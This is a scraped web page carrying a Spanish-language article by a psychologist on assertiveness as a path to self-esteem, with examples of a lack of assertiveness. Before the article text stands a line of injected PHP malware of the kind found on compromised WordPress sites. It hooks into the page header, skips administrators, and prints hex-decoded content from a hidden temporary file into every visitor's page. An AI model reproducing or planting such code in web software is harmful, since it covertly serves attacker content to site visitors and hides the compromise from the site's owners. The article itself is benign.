if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } ASERTIVIDAD COMO CAMINO HACIA LA AUTOESTIMA – La Opinión Universitaria La Opinión Universitaria
Menu

ASERTIVIDAD COMO CAMINO HACIA LA AUTOESTIMA

 

Escrito por: Psic. Lourdes Arriaga

La asertividad es un término que tiene que ver con las habilidades sociales, se trata de “cómo quedar bien con todo el mundo y no dejarse pisar”, en términos coloquiales. Se ubica muy cerca de la autoestima porque está ligada al respeto y cariño hacia uno mismo y, por lo tanto, hacia el resto de la gente. Cuando hablamos de cariño hacia uno mismo nos remitimos al concepto de respeto y este es un término muy difícil de definir. ¿Qué hace que una persona se respete a sí misma?, ¿por qué hay personas hacia las cuales se tiene un respeto natural, de esas de las que no se burla nadie, a las que nadie levanta la voz, y, por otro lado, personas que suscitan la burla y hasta desprecio de los demás? Va más allá de defenderse, se trata de hacerse escuchar.

Las personas con poco asertividad suelen ser personas inseguras, por tanto, la inseguridad es un factor determinante que deberá tratarse con honestidad, pero al mismo tiempo, esta inseguridad es inherente al ser humano, todos somos inseguros en alguna área de la vida o somos inseguros por etapas vitales. Las personas que no se hacen escuchar o no se defienden tienen como característica la incapacidad de hacerse respetar, para esto hace falta sentirse seguro de sí mismo y, a la vez, ser capaz de autoafirmarse, de responder correctamente y de ser adecuado socialmente, es decir, ser asertivo.

Las personas que presentan algún problema en su forma de relacionarse, tienen una falta de asertividad. Pueden ser de dos formas:

  1. Poco asertivas, son las personas consideradas tímidas, prestas a sentirse pisadas y no respetadas.
  2. Personas agresivas, que pisan a los demás y no tienen en cuenta las necesidades del otro.

Ambas posturas alejan a la persona de una sana autoestima porque impiden que se relacione con los demás de igual a igual, ni por encima ni por debajo. La persona no asertiva, retraída o agresiva, no puede tener una autoestima muy alta, porque siente la necesidad imperiosa de ser valorada por los demás.

Por tanto, podemos decir que asertividad es la capacidad de autoafirmar los propios derechos sin dejarse manipular y sin manipular a los demás.

Ejemplos de falta de asertividad:

  1. No llevar a cabo deseos propios
  2. No negarse a nada
  3. No enfrentarse
  4. No enojarse
  5. Mostrar un excesivo control, con tal de no demostrar un disgusto
  6. Culpabilidad excesiva

Si sientes que te identificas con una pobre asertividad te invito a que reflexiones sobre tus necesidades. Cuando las tenemos claras se vuelve más fácil identificar nuestros límites y pedir el respeto de los demás. Los temas de necesidades, límites y asertividad (comunicarlos correctamente) están directamente relacionados.

Nos leemos en la próxima participación.

  • Tweets recientes